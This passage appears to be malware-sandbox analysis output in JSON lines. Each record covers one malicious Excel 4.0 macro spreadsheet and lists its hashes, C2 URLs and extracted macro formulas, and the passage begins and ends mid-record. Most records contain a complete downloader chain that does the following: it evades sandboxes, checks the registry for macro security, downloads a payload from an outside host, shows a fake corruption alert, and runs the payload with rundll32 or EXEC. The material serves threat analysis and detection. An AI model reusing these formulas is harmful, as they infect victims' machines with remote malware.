corrupt.\",2)\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\cwep5ef.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"6NjruxPp1i\",TRUE)\nGOTO(R$1C$10)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"a9b91b864157867dac1dfa72138e7b817515e2e39d29598b2ae086690649f548"},"analysis":{"reported":"2020-04-09T16:18:13Z","score":10},"files":[{"filename":"a9b91b864157867dac1dfa72138e7b817515e2e39d29598b2ae086690649f548","filesize":112640,"md5":"e5c192062a989bac3e24dbaa1e06b324","sha1":"63a26c1041868db127305c678efe6aeb0d1af302","sha256":"a9b91b864157867dac1dfa72138e7b817515e2e39d29598b2ae086690649f548","sha512":"bc44e059916bb4a415a22f026f7e896aa95d19143a1ad2e1564102fad0e0a32e603c447b483aaa01e51090d029ea036cd68f3fb797c810ff9801e2cf51edc7f3","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"a9b91b864157867dac1dfa72138e7b817515e2e39d29598b2ae086690649f548.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Microsoft Office Webquery","c2":["https://pnxkntdl.xyz/KJSDBViad7"]}},{"config":{"rule":"Excel 4.0 XLM Macro","attr":{"formulas":"IF(GET.WORKSPACE(19),,CLOSE(TRUE))\nIF(GET.WORKSPACE(42),,CLOSE(TRUE))\nRETURN()\nRETURN()\nRETURN()"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"a9e2f7cfdd80a1ce02d78f6fd6bc5cb6249d59235d719ce738bcabaf6211c5c1"},"analysis":{"reported":"2020-04-09T16:18:14Z","score":10},"files":[{"filename":"a9e2f7cfdd80a1ce02d78f6fd6bc5cb6249d59235d719ce738bcabaf6211c5c1","filesize":113664,"md5":"8b3dd0262bbd9d52713f9566da28840f","sha1":"95bee0bb746832e4fc94ee94fbab72d722e9485e","sha256":"a9e2f7cfdd80a1ce02d78f6fd6bc5cb6249d59235d719ce738bcabaf6211c5c1","sha512":"1f4027a22a0427a0ec92c68bd003c921c8d698c61e060b42dfb2f22b22861d1dce1f8722a37147e519fd3340dd88468562311d21053c11f1ec750bee4b906847","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"a9e2f7cfdd80a1ce02d78f6fd6bc5cb6249d59235d719ce738bcabaf6211c5c1.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","c2":["https://fbknuele.pw/aagaeg4df12"],"attr":{"formulas":"=IF(GET.WORKSPACE(13)\u003c770, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(14)\u003c381, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"https://fbknuele.pw/aagaeg4df12\",\"c:\\Users\\Public\\bwep5ef.html\",0,0)\n=ALERT(\"The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt.\",2)\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\bwep5ef.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"TWB0WISEEi\",TRUE)\nGOTO(R$1C$10)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"a9ff4fd34680133b3cfdc5e85a1af02d033f4127ee2dce2a810bb0ead435d05f"},"analysis":{"reported":"2020-04-09T16:18:14Z","score":10},"files":[{"filename":"a9ff4fd34680133b3cfdc5e85a1af02d033f4127ee2dce2a810bb0ead435d05f","filesize":62976,"md5":"ad9848bbbf9ae932c9ccb7e2531e7a6c","sha1":"7b93ba13bf7c5224cd10909a30b2cf1829f73eb5","sha256":"a9ff4fd34680133b3cfdc5e85a1af02d033f4127ee2dce2a810bb0ead435d05f","sha512":"6e5f4904add38975ffadbfb9299bf4b47ee7dc1eca742e5e6dbf8e26a4d2f68d41b73ac6ea03e0f75c7932c81a07ff7f2e9aec38512579b9dea493fcfb2ec20c","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"a9ff4fd34680133b3cfdc5e85a1af02d033f4127ee2dce2a810bb0ead435d05f.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","attr":{"formulas":"SUM(\"???\",R$48C$9,R$21C$11,R$31C$9)\nSUM(R$31C$9,R$21C$11,R$48C$9)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"aa0241124e57f121dc1bfeee1a5fb1369c012ad7c03a4a97c8d5dfa652a24340"},"analysis":{"reported":"2020-04-09T16:18:14Z","score":10},"files":[{"filename":"aa0241124e57f121dc1bfeee1a5fb1369c012ad7c03a4a97c8d5dfa652a24340","filesize":141824,"md5":"eb4e4cd84914ca3a751d7678794abd7e","sha1":"2e9db4ed48e3699c12bbe548f79c1c6a01403c1b","sha256":"aa0241124e57f121dc1bfeee1a5fb1369c012ad7c03a4a97c8d5dfa652a24340","sha512":"7823596ff7579caff5f351c98f943cdffab3c033e674c01d91cb7b6dcbb85ce807db7b09549a32a1b3a04ba8f9b227c3551fa33c04787d48f254e5607b12c582","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"aa0241124e57f121dc1bfeee1a5fb1369c012ad7c03a4a97c8d5dfa652a24340.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Microsoft Office Webquery","c2":["https://wrjmkdod.xyz/SDFwef2fvbbe"]}},{"config":{"rule":"Excel 4.0 XLM Macro","attr":{"formulas":"IF(GET.WORKSPACE(42),,CLOSE(TRUE))\nGET.WORKSPACE(13)\nGET.WORKSPACE(14)\nIF(R$28C$1\u003c770,CLOSE(FALSE),)\nIF(R$29C$1\u003c380,CLOSE(FALSE),)\nIF(GET.WORKSPACE(19),,CLOSE(TRUE))\nRETURN()\nWORKBOOK.HIDE(\"CpopfIQ5ZI\",TRUE)\nRETURN()\nRETURN()"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"aa0cecc9c31a07d147125feef4d1c097d18458eaf8be98e327f9e099b5a86396"},"analysis":{"reported":"2020-04-09T16:18:14Z","score":10},"files":[{"filename":"aa0cecc9c31a07d147125feef4d1c097d18458eaf8be98e327f9e099b5a86396","filesize":182784,"md5":"f75f55be14b5ba9550380a28675c9854","sha1":"6188476cf04c003c4dc19cf5a0f5beb115fbe47c","sha256":"aa0cecc9c31a07d147125feef4d1c097d18458eaf8be98e327f9e099b5a86396","sha512":"7a1f997b69a21d2ad1f3f95e355fb19c6af9b63235cfb78c747e2c011d366bf3ffff9763f38ea6b47ed50c6b7b62d7659e5f02d1b101be35014a1ca4eefc6e4d","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"aa0cecc9c31a07d147125feef4d1c097d18458eaf8be98e327f9e099b5a86396.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","c2":["http://g2creditsolutions.com/trusty/444444.png","http://lorrainehomeconsulting.com/wp-content/uploads/2020/02/trusty/187213.png"],"attr":{"formulas":"ERROR(FALSE)\nCALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"http://g2creditsolutions.com/trusty/444444.png\",\"c:\\Users\\Public\\1.exe\",0,0)\nIF(R$1C$0\u003c0,CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"http://lorrainehomeconsulting.com/wp-content/uploads/2020/02/trusty/187213.png\",\"c:\\Users\\Public\\1.exe\",0,0),)\nALERT(\"The workbook cannot be opened or repaired by Microsoft Excel because it is corrupt.\",2)\nEXEC(\"c:\\Users\\Public\\1.exe\")\nCLOSE(FALSE)\nWORKBOOK.HIDE(\"SDJKv3\",TRUE)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"aa29bef984f222a455a4fc801f72b293605c64130fd01dc4e616c3824b4d93dc"},"analysis":{"reported":"2020-04-09T16:18:14Z","score":10},"files":[{"filename":"aa29bef984f222a455a4fc801f72b293605c64130fd01dc4e616c3824b4d93dc","filesize":225280,"md5":"28b02b722a6c19ad9230c6c80b0bfb28","sha1":"08040b963c2d029e1d2240ca0b86cc2c43e08556","sha256":"aa29bef984f222a455a4fc801f72b293605c64130fd01dc4e616c3824b4d93dc","sha512":"ba59f692f1268f44c856f7383156626722ba6411fa61cb6504420e4238a7dc12563645e6e11c89a8df3ab9eb50c0ec91496dfd101f2744f6d647373aec57e504","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"aa29bef984f222a455a4fc801f72b293605c64130fd01dc4e616c3824b4d93dc.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","c2":["https://amberlessard.xyz/brg2sv"],"attr":{"formulas":"=IF(GET.WORKSPACE(13)\u003c770, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(14)\u003c381, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\reg.exe\",\"EXPORT HKCU\\Software\\Microsoft\\Office\\\"\u0026GET.WORKSPACE(2)\u0026\"\\Excel\\Security c:\\users\\public\\1.reg /y\",0,5)\n=WAIT(NOW()+\"00:00:03\")\n=FOPEN(\"c:\\users\\public\\1.reg\")\n=FPOS(R[-1]C, 215)\n=FREAD(R[-2]C, 255)\n=FCLOSE(R[-3]C)\n=FILE.DELETE(\"c:\\users\\public\\1.reg\")\n=IF(ISNUMBER(SEARCH(\"0001\",R[-3]C)),CLOSE(FALSE),)\n=CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"https://amberlessard.xyz/brg2sv\",\"c:\\Users\\Public\\csg75ef.html\",0,0)\n=ALERT(\"The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt.\",2)\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\csg75ef.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"piFGd9Jn0z\",TRUE)\nGOTO(R$0C$18)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"aa474b84684a1539524b836157caf45433ec893cef2060f2f31e381881f89f9a"},"analysis":{"reported":"2020-04-09T16:18:14Z","score":10},"files":[{"filename":"aa474b84684a1539524b836157caf45433ec893cef2060f2f31e381881f89f9a","filesize":209408,"md5":"2b1bf056a89650af908f495b91705f88","sha1":"91128e6641506b29ee97ae7b65f61e3d1b4337d8","sha256":"aa474b84684a1539524b836157caf45433ec893cef2060f2f31e381881f89f9a","sha512":"51cf775338b09aef72574930c22f38f68cdc1cab1709e31ed543a76ff76ebde40db3d91d14e99acc7582a270ae06d5748819b900f487720731a30af95ed4860f","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"aa474b84684a1539524b836157caf45433ec893cef2060f2f31e381881f89f9a.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","c2":["https://paxtontranter.xyz/rv24t2"],"attr":{"formulas":"=IF(GET.WORKSPACE(13)\u003c770, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(14)\u003c381, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"https://paxtontranter.xyz/rv24t2\",\"c:\\Users\\Public\\bwep5ef.html\",0,0)\n=ALERT(\"The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt.\",2)\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\bwep5ef.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"HHSZopesk7\",TRUE)\nGOTO(R$1C$10)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"aa4d4262e82692dc7d4b641e859c4dbe10ee9505a37ef1ad84f07bf29e43df9b"},"analysis":{"reported":"2020-04-09T16:18:14Z","score":10},"files":[{"filename":"aa4d4262e82692dc7d4b641e859c4dbe10ee9505a37ef1ad84f07bf29e43df9b","filesize":141312,"md5":"57093fe065c28aed404472031fb5b792","sha1":"7b7ccd4c45857506b349ef9ad61c22c1930c1903","sha256":"aa4d4262e82692dc7d4b641e859c4dbe10ee9505a37ef1ad84f07bf29e43df9b","sha512":"a3c5c69a60de0a60342674307d614fd0f40c1fd0c48064330688670496e4b3d126aa4216c010ef3c8a823354d691f86da20a14bd84ca13348dc6a82d2fae7e88","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"aa4d4262e82692dc7d4b641e859c4dbe10ee9505a37ef1ad84f07bf29e43df9b.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Microsoft Office Webquery","c2":["https://pjtcdnrd.pw/ckjbvkf732"]}},{"config":{"rule":"Excel 4.0 XLM Macro","attr":{"formulas":"IF(GET.WORKSPACE(42),,CLOSE(TRUE))\nGET.WORKSPACE(13)\nGET.WORKSPACE(14)\nIF(R$1C$0\u003c770,CLOSE(FALSE),)\nIF(R$2C$0\u003c381,CLOSE(FALSE),)\nIF(GET.WORKSPACE(19),,CLOSE(TRUE))\nGET.WORKSPACE(26)\nRETURN()\nGOTO(R$0C$2)\nRETURN()\nRETURN()\nRETURN()\nWORKBOOK.HIDE(\"jBEEkgxbgV\",TRUE)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"aa5c85e4b666ffe50df7127b3a2529161d2e7f58f4e2f4fd518e04aca998cd05"},"analysis":{"reported":"2020-04-09T16:18:14Z","score":10},"files":[{"filename":"aa5c85e4b666ffe50df7127b3a2529161d2e7f58f4e2f4fd518e04aca998cd05","filesize":214528,"md5":"71d24b7b0e3c99899e707304984f9c8d","sha1":"94b1ba6877e5a34f447e2a8a71b91cc08fd7e46e","sha256":"aa5c85e4b666ffe50df7127b3a2529161d2e7f58f4e2f4fd518e04aca998cd05","sha512":"1c50e33611fc24e3ffc430631f22507f2dc37175ee9816804056469616f36b80d334d865e2afe566873e25f030028992bd593a9f8b9d5213dba7324bb3d393f1","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"aa5c85e4b666ffe50df7127b3a2529161d2e7f58f4e2f4fd518e04aca998cd05.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","c2":["https://amgdorie.online/avdv43g"],"attr":{"formulas":"=IF(GET.WORKSPACE(13)\u003c770, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(14)\u003c381, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\reg.exe\",\"EXPORT HKCU\\Software\\Microsoft\\Office\\\"\u0026GET.WORKSPACE(2)\u0026\"\\Excel\\Security c:\\users\\public\\1.reg /y\",0,5)\n=WAIT(NOW()+\"00:00:03\")\n=FOPEN(\"c:\\users\\public\\1.reg\")\n=FPOS(R[-1]C, 215)\n=FREAD(R[-2]C, 255)\n=FCLOSE(R[-3]C)\n=FILE.DELETE(\"c:\\users\\public\\1.reg\")\n=IF(ISNUMBER(SEARCH(\"0001\",R[-3]C)),CLOSE(FALSE),)\n=CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"https://amgdorie.online/avdv43g\",\"c:\\Users\\Public\\bug75ef.html\",0,0)\n=ALERT(\"The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt.\",2)\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\bug75ef.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"535lzsnG7Q\",TRUE)\nGOTO(R$0C$18)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"aa749a57f6584a4ff79e6a8013af8e502aed9ca78071ff521d0d0a01c6405940"},"analysis":{"reported":"2020-04-09T16:18:14Z","score":10},"files":[{"filename":"aa749a57f6584a4ff79e6a8013af8e502aed9ca78071ff521d0d0a01c6405940","filesize":209920,"md5":"c65e5edf051dfd03285489bc8508adf5","sha1":"5c7a536ff4de518b5fcac03780474a4c3184ebd8","sha256":"aa749a57f6584a4ff79e6a8013af8e502aed9ca78071ff521d0d0a01c6405940","sha512":"992059122b312b6f27b19d2fa36043e65ee9231753cc4c08bf5e1a2f046ff7af8167614fcbca61243e0e21f77051e9070ceaddb13d39b5ef5dfe08717088d597","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"aa749a57f6584a4ff79e6a8013af8e502aed9ca78071ff521d0d0a01c6405940.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","c2":["http://fcowhcwsb.space/erg4ewr1"],"attr":{"formulas":"=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\reg.exe\",\"EXPORT HKCU\\Software\\Microsoft\\Office\\\"\u0026GET.WORKSPACE(2)\u0026\"\\Excel\\Security c:\\users\\public\\1.reg /y\",0,5)\n=WAIT(NOW()+\"00:00:03\")\n=FOPEN(\"c:\\users\\public\\1.reg\")\n=FPOS(R[-1]C, 215)\n=FREAD(R[-2]C, 255)\n=FCLOSE(R[-3]C)\n=FILE.DELETE(\"c:\\users\\public\\1.reg\")\n=IF(ISNUMBER(SEARCH(\"0001\",R[-3]C)),CLOSE(FALSE),)\n=CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"http://fcowhcwsb.space/erg4ewr1\",\"c:\\Users\\Public\\b7gf5ef.html\",0,0)\n=ALERT(\"The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt.\",2)\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\b7gf5ef.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"PzVeYrLHfV\",TRUE)\nGOTO(R$0C$16)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"aa7b5d63cbad6c79b462cdd58de2e1b0c7743f562c4f9ff14be1c97e3bf35973"},"analysis":{"reported":"2020-04-09T16:18:14Z","score":10},"files":[{"filename":"aa7b5d63cbad6c79b462cdd58de2e1b0c7743f562c4f9ff14be1c97e3bf35973","filesize":112640,"md5":"b8b29235237788dbdf947d9e285a7824","sha1":"1a963158f79e745a96116691a7e3264642a28006","sha256":"aa7b5d63cbad6c79b462cdd58de2e1b0c7743f562c4f9ff14be1c97e3bf35973","sha512":"e057111c0d9c9dc301797e1fa8ea3ba8362d0e4e4cb6a70cc916adb6c2d25000bae3878c6b08974751d0aa66f014f5f8cf55ea1ffcca7f1d6b99a019eeaa3bd6","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"aa7b5d63cbad6c79b462cdd58de2e1b0c7743f562c4f9ff14be1c97e3bf35973.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Microsoft Office Webquery","c2":["https://pnxkntdl.xyz/KDSBVksdhv778a"]}},{"config":{"rule":"Excel 4.0 XLM Macro","attr":{"formulas":"IF(GET.WORKSPACE(42),,CLOSE(TRUE))\nRETURN()\nRETURN()\nRETURN()"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"aa8bf5503585b376b0f278e257e791b8de33ca75c610adfd8fd9384beb507525"},"analysis":{"reported":"2020-04-09T16:18:14Z","score":10},"files":[{"filename":"aa8bf5503585b376b0f278e257e791b8de33ca75c610adfd8fd9384beb507525","filesize":168448,"md5":"f99424d2afe596f1990ef87fc08391a1","sha1":"b98f7e18367129ba834fc4cd6922efe181cd81fc","sha256":"aa8bf5503585b376b0f278e257e791b8de33ca75c610adfd8fd9384beb507525","sha512":"30a46c147b26e21c9c062cda25697b6eb09def423f50c786e7d6e49c4ff7487d2deb03093e5467883794c0e78b63f25df53ee855e97bb98937d7bdbed7a8e415","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"aa8bf5503585b376b0f278e257e791b8de33ca75c610adfd8fd9384beb507525.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","c2":["https://cdncloudtech.xyz/bag4hy","https://waitupdate.xyz/deg34g"],"attr":{"formulas":"=IF(GET.WORKSPACE(13)\u003c770, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(14)\u003c381, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"https://cdncloudtech.xyz/bag4hy\",\"c:\\Users\\Public\\cogp5yf.html\",0,0)\n=IF(R[-1]C\u003c0,CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"https://waitupdate.xyz/deg34g\",\"c:\\Users\\Public\\cogp5yf.html\",0,0),)\n=ALERT(\"The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt.\",2)\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\cogp5yf.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"3gRzC8wWyd\",TRUE)\nGOTO(R$0C$11)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"aa91407a42f469ab9616f98e07433e47c8e715d8d48175c463c373d196167d6c"},"analysis":{"reported":"2020-04-09T16:18:14Z","score":10},"files":[{"filename":"aa91407a42f469ab9616f98e07433e47c8e715d8d48175c463c373d196167d6c","filesize":185344,"md5":"2663850b02fa2ac3bc321b3a8f5ad748","sha1":"a20bd0a63abd004ae98b40bb9f954d6c5a6a89ac","sha256":"aa91407a42f469ab9616f98e07433e47c8e715d8d48175c463c373d196167d6c","sha512":"ac0ab0f1a4d0226f34bd3fa3d30e669046fba1635b9fb8113df242af02e804b558c60b369b703e75e58ae69a806ad0dcbe59b9cb2b92daa4df70a3a591ac7603","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"aa91407a42f469ab9616f98e07433e47c8e715d8d48175c463c373d196167d6c.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Microsoft Office Webquery","c2":["https://emmnebuc.xyz/DSKVJBdsj2"]}},{"config":{"rule":"Excel 4.0 XLM Macro","attr":{"formulas":"IF(ALERT(\"We found a problem with some content. Do you want to try to recover as much as we can?\",1),,CLOSE(TRUE))\nIF(GET.WORKSPACE(19),,CLOSE(TRUE))\nIF(GET.WORKSPACE(42),,CLOSE(TRUE))\nRETURN()\nRETURN()\nRETURN()"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"aa9400ba5cb24d11a8d846964b29367095952eadf7eeff1aaaf7efba355ba53e"},"analysis":{"reported":"2020-04-09T16:18:14Z","score":10},"files":[{"filename":"aa9400ba5cb24d11a8d846964b29367095952eadf7eeff1aaaf7efba355ba53e","filesize":145408,"md5":"c109b131631d9f98696077dfecbbb6a5","sha1":"7e4d98fb84789b869e96ce54966ca71a7d94b7f2","sha256":"aa9400ba5cb24d11a8d846964b29367095952eadf7eeff1aaaf7efba355ba53e","sha512":"5f5a996dd86733ae8a7a1ce2987efd684492b358cd2709975e05fc3f8db21ee1c4638eadb66e75076749dc5c92773569578be0d862e2456ae7701ae9da795c2e","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"aa9400ba5cb24d11a8d846964b29367095952eadf7eeff1aaaf7efba355ba53e.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","c2":["https://studyshine.in/wp-cryn.php","https://arturkauf.pl/wp-cryn.php"],"attr":{"formulas":"=IF(GET.WORKSPACE(13)\u003c770, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(14)\u003c381, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"https://studyshine.in/wp-cryn.php\",\"c:\\Users\\Public\\bwep5ef.html\",0,0)\n=IF(R[-1]C\u003c0,CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"https://arturkauf.pl/wp-cryn.php\",\"c:\\Users\\Public\\bwep5ef.html\",0,0),)\n=ALERT(\"The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt.\",2)\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\bwep5ef.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"dt05xkxmVp\",TRUE)\nGOTO(R$0C$11)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"aa96ae9c731466ed85114b3a3b69bfc6957e9b66e09daaad420e7a2ac4bb14b0"},"analysis":{"reported":"2020-04-09T16:18:14Z","score":10},"files":[{"filename":"aa96ae9c731466ed85114b3a3b69bfc6957e9b66e09daaad420e7a2ac4bb14b0","filesize":206336,"md5":"d832ec9d58ac4b4d61030834229ad59c","sha1":"a6d87b86e61cc4d604362277c35c8dda7e01454c","sha256":"aa96ae9c731466ed85114b3a3b69bfc6957e9b66e09daaad420e7a2ac4bb14b0","sha512":"cddb72ccef22be7c9884d777fd27bac514ce76817a441a3ee7c37926dea61e8cea5544ec51f9b1357098ff4c9ef0a938c262fe8673eaff3c34aa10602becd2fb","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"aa96ae9c731466ed85114b3a3b69bfc6957e9b66e09daaad420e7a2ac4bb14b0.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","c2":["https://rwtkoaqe.club/adfbr53g"],"attr":{"formulas":"=IF(GET.WORKSPACE(13)\u003c770, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(14)\u003c400, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\reg.exe\",\"EXPORT HKCU\\Software\\Microsoft\\Office\\\"\u0026GET.WORKSPACE(2)\u0026\"\\Excel\\Security c:\\users\\public\\1.reg /y\",0,5)\n=WAIT(NOW()+\"00:00:03\")\n=FOPEN(\"c:\\users\\public\\1.reg\")\n=FPOS(R[-1]C, 215)\n=FREAD(R[-2]C, 255)\n=FCLOSE(R[-3]C)\n=FILE.DELETE(\"c:\\users\\public\\1.reg\")\n=IF(ISNUMBER(SEARCH(\"0001\",R[-3]C)),CLOSE(FALSE),)\n=CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"https://rwtkoaqe.club/adfbr53g\",\"c:\\Users\\Public\\bug65eh.html\",0,0)\n=ALERT(\"The workbook cannot be opened or repaired by Microsoft Excel because it's 